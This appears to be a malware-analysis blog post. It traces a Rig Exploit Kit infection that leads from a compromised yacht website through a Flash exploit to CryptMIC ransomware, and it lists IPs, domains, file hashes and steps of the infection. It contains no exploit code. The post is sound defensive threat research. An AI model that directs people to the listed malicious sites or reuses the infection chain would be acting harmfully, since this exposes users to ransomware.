- 22.214.171.124 – zurnyachts[.]com – Compromised Site
- 126.96.36.199 – butterteigenpassionisten.loganslittleangels.org – Rig EK
- 188.8.131.52 – CryptMIC post-infection traffic via TCP port 443
Video of Infection:
Sorry in advance if you don’t like my music selection! I will take song requests for $10! 😉
- SHA256: 00895735b2297cd73b723f27120bd86c56957e069156050a8eabf3e8a3811fa4
File name: RigEK Landing Page.html
- SHA256: dbb2d959adc4986c43b6e9279d90ceb55a3b1686a0ac229575dc0f8dcac2e26f
File name: RigEK Flash Exploit.swf
- SHA256: e1c7071c4449b043d2d57f6501f463481f79b49e2cc4f75b4df5acf862b03f4d
File name: radA5147.tmp.exe
The infection starts out with the user (that would be me) browsing to a compromised website. In this case that website was zurnyachts[.]com (DO NOT GO TO THAT SITE). Within the site is a script from a campaign known as “pseudoDarkleech”. The script is very easy to spot when you know what you’re looking for. In this example it was at the very top of the source code, above the <html> tags. Here is a picture of the script on the site:
Once the browser loads the compromised website the URL within the pseudoDarkleech iframe causes a GET request to the Rig Exploit Kit landing page. At this point you’re off to the races. Here is the GET request for said landing page:
The landing page is being obfuscated and encoded. However, it would be at this point that the system would receive instructions to download a Flash exploit. Below is the GET request for a Flash exploit:
If successful the payload will follow. In this instance we see it dropping an executable into %TEMP%:
In the video you can see the executable being proceeded by a .js file. You can also see me trying to quickly copy it for fun but I failed to do before it deleted itself.
I also want to mention that even though the payload was delivered to the host there seems to have been an error. Somewhere along the way it failed to encrypt my files. In any case, you can see the ransom notes being dropped in %TEMP% and on the Desktop.
My recommendation would be to block the compromised website (for maybe a month or until it gets cleaned) and Rig EK IP on enterprise networks.